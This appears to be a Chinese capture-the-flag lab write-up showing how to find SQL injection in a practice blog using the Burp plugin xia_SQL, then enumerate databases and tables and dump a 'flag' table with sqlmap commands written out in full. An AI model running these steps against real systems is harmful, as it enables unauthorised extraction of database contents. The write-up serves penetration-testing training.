【好靶场】某博客存在SQL注入

这里我们借助一个burp插件"xia_SQL"

这里我们【启动插件】【监控Proxy】

然后在页面上多点点,xia_SQL就会被动进行SQL注入测试

查看"xia_SQL",可以看到xia_SQL会给疑似存在SQL注入的连接打勾

我们把请求转发到Repeater,然后将-0去掉,添加*

添加*是SQLMAP中的用法,是为了告诉SQLMAP这里存在注入点,这样可以加快SQLMAP扫描进程

然后我们通过明动转发给SQLMAP

这里就是调用SQLMAP的命令,其中--batch表示需要用户交互的过程都选择默认、--level 3表示测试等级3会测试更多payload,--threads 10 表示10线程

可以看到存在SQL注入漏洞

我们将上面的命令复制下来

添加--dbs,来爆破数据库名

复制代码
python sqlmap.py -r C:\Users\ANONYM~1\AppData\Local\Temp\\request-20260401205912.raw --batch --level 3 --threads 10 --dbs

看到出现4个数据库,这里我们选择web

接下来我们获取web数据库中的数据表

复制代码
python sqlmap.py -r C:\Users\ANONYM~1\AppData\Local\Temp\\request-20260401205912.raw --batch --level 3 --threads 10 -D "web" --tables

发现有一个flag数据表

我们添加--dump,来获取flag表中的数据

复制代码
python sqlmap.py -r C:\Users\ANONYM~1\AppData\Local\Temp\\request-20260401205912.raw --batch --level 3 --threads 10 -D "web" -T "flag" --dump

得到flag

相关推荐
见青..8 小时前
phpMyAdmin权限提升
web安全·网络安全·phpmyadmin
数据知道9 小时前
邮件安全实战:SPF/DKIM/DMARC 配置与钓鱼绕过
网络·安全·web安全·网络安全·邮件安全
世界尽头与你13 小时前
Android Root 检测原理
android·安全·网络安全·渗透测试
kp0000013 小时前
如何平衡模型输出的“有用性”和“安全性
人工智能·安全·网络安全·信息安全·ai安全
世界尽头与你15 小时前
iOS 越狱检测原理
安全·网络安全·ios·信息安全·渗透测试
kp000001 天前
大模型输出造成信息泄露类型
人工智能·网络安全·信息安全·ai安全
kp000001 天前
System Prompt Leakage(系统提示词泄露)及安全防御
网络·安全·网络安全·信息安全·prompt·ai安全
X7x51 天前
攻防对抗的结构化思维:深度拆解网络杀伤链(Kill Chain)与现代防御演进
网络安全·网络攻击模型·安全架构·网络杀伤链·kill chain
kp000001 天前
AI大模型,如何区分善意提问与Prompt注入攻击
人工智能·网络安全·信息安全·prompt·ai安全
kp000001 天前
AI系统输入安全基线
人工智能·安全·网络安全·信息安全·ai安全